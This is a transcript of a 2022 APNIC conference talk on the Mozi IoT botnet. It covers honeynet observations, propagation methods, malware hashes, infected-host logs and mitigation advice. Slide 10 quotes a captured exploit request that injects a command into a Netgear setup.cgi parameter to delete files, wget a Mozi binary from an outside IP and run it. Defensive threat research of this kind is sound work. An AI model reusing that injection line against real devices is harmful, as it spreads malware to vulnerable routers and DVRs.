APNIC Senior Internet Security Specialist, Adli Wahid, presented on the Mozi botnet, what was observed and how it was mitigated at the 38th TWNIC OPM, held on 1 December 2022 in Taipei.

1. Observations and Mitigation
of Mozi botnet
Adli Wahid adli@apnic.net
Senior Internet Security Specialist APNIC
1

2. Let’s Connect!
• LinkedIn: Adli Wahid
• Twitter/Instagram: @adliwahid
• Email: adli@apnic.net
2
https://unsplash.com/@adliwahid

3. Discussion
1. Background
2. Mozi (IoT) Botnet
3. Observations
4. Vulnerabilities & Products
5. Mitigation & Remediation
Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research &
presentation
3

4. Background (Source of Data)
• APNIC Community Honeynet Project
oCollaboration with partners across AP
• Honeypots & Honeynet
oAnything that interact with the honeypots is suspect
oConfirmed with observed actions + artifacts (payload, logs, etc)
oDefinitely not ’spoofed’ traffic
• Types of Honeypots
oTelnet/SSH (Cowrie) ** relevant for this talk
oOld vulnerabilities – i.e SMB (Dionaea)
4

5. What We Observe
• Attacks that spread via
oSSH & Telnet bruteforce
oExploiting _known_ vulnerabilities
• Nature of
oMalware - cryptominers, ddos agents, etc
oSource of attack == infected devices*
• Left of the Hack
oObservations on attacker’s infrastructure
oBot recruitments
oScripts, malware payload, traffic
• Attacks that no one pays attention to J
5
DDoS
Attack
timeline
Build/Buy Infrastructure
• Write malware
• Infect devices
• Setup Command & Control
“Left of the Hack”
“The Hack”

6. Mozi Botnet
• Discovered in September 2019 by Netlab
• Significant outbreak in Sept 2020 (100k
nodes)
• Targets IoT devices (MIPs, ARM, PPC and
x86)
• Uses unique P2P Command & Control
o BitTorrent Distributed Hash Table (DHT) as
carrier protocol
o Makes it robust & tricky* to track
• Some capabilities (from config)
o Perform a Ddos attack
o Update executable from given URL
o Execute command via shell or system()
o DNS Spoofing
o HTTP Session Hijacking (with JS)
o Mining
• Code base from other botnets
o Gafgyt
o Mirai
• Propagation
o 14 HTTP based exploits of via web
interface of IoT Devices
o Mainly Telnet**, FTP, SSH credentials
brute-force
6

7. 7
Nmap scan report for host-x.static.kbtelecom.net
(219.x.y.184)
Host is up (0.062s latency).
PORT STATE SERVICE VERSION
53387/tcp open elf-exe ELF 32-bit executable file
This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR

8. 8
Infected
Device
Infected
Device
Server Hosting
Payload
Command &
Control
Infected
Device
Typical DDoS botnet (mirai, etc)
Infected node – communicate with other node.
No centralized infrastructure

9. Mozi Author ”taken custody” by LEA in 2021
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
Is it still
around?
9

10. 2022 - Still Active?
durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900]
"GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-
rf+/tmp/*;
wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear;
sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0
Check your webserver logs for Mozi.a or Mozi.m
10

11. Observations in APNIC Honeynet Project
• In 05/2022, we observed an ELF binary “.i” in some URLs
o Post-login downloads
• Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as attacking host or different
Source IP (attacking/spreading) IP hosting binary:random_port
o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
11
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.1

12. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable,
ARM, EABI5 version 1 (GNU/Linux),
statically linked, stripped
• SHA256
a04ac6d98ad989312783d4fe3456c53730
b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on
the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a
|| $IP:PORT/mozi.m ||
$IP:PORT/Mozi.m ||
$IP:PORT/Mozi.a ||
$IP:PORT/config
12

13. Observations – (hash) fingerprints
:~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m
b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i
~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i
479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m
6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i
~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i
23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i
b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a
a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m
b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m
289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i
13
Are they the
same files?

14. Slowly increasing last 6 months
Daily Hits
14
Snapshot on 29/11/2022

15. IP from TW – last 6 months
[Snippet]
2022-11-29T00:41:00.077072,60.x.y.205,hxxp://60.x.y.205:61756/.i,TW,3462
2022-11-29T08:49:20.515523,59.x.y.10,hxxp://59.x.y.10:12819/.i,TW,3462
2022-11-29T09:01:48.079099,220.x.y.53,hxxp://220.x.y.53:29971/.i,TW,3462
2022-11-29T17:53:40.465965,49.x.y.24,hxxp://49.x.y.24:45704/.i,TW,18049
2022-11-30T15:48:10.382224,123.x.y.244,hxxp://171.x.y.95:39821/.i,TW,131596
15

16. Serving Malware
2022-08-30T11:07:19.374102,202.x.y.26(MN),hxxp://61.a.b.131:58871/.i (TW)
2022-10-18T12:34:38.452976,202.x.y.26(MN),hxxp://219.a.b.184:53387/.i (TW)
16
* Server hosting
Mozi is not the
attacking device
** Repeat
offenders
Source from MN IP serving Mozi binary

17. Mitigation & Remediation (not just Mozi)
• To prevent
o Spread
o Impact (i.e. DDoS, Redirect , Mining)
• The Usual Advice
o Harden Device – Patch, Strong Credentials
o But whose job is it anyways?
• Proactive – Monitor, Respond & Share***
o Get Feeds on Infected Devices
o Sources of Feeds – ShadowServer Foundation, DASH/APNIC Honeynet,
Abuse.CH ThreatFox
o Have a response plan
• Threat awareness
o Attackers build infrastructure before attacking
o Don’t wait for an attack to happen
17

18. Thank You!
Adli Wahid
<adli@apnic.net>
18

19. Resources
1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/
2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-
lingering-bots/
3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/
4. https://www.microsoft.com/security/blog/2021/08/19/how-to-
proactively-defend-against-mozi-iot-botnet/
5. ShadowServer Foundation - https://www.shadowserver.org/what-
we-do/network-reporting/get-reports/
6. APNIC DASH – https://dash.apnic.net
7. APNIC Community Honeynet Project – adli@apnic.net
19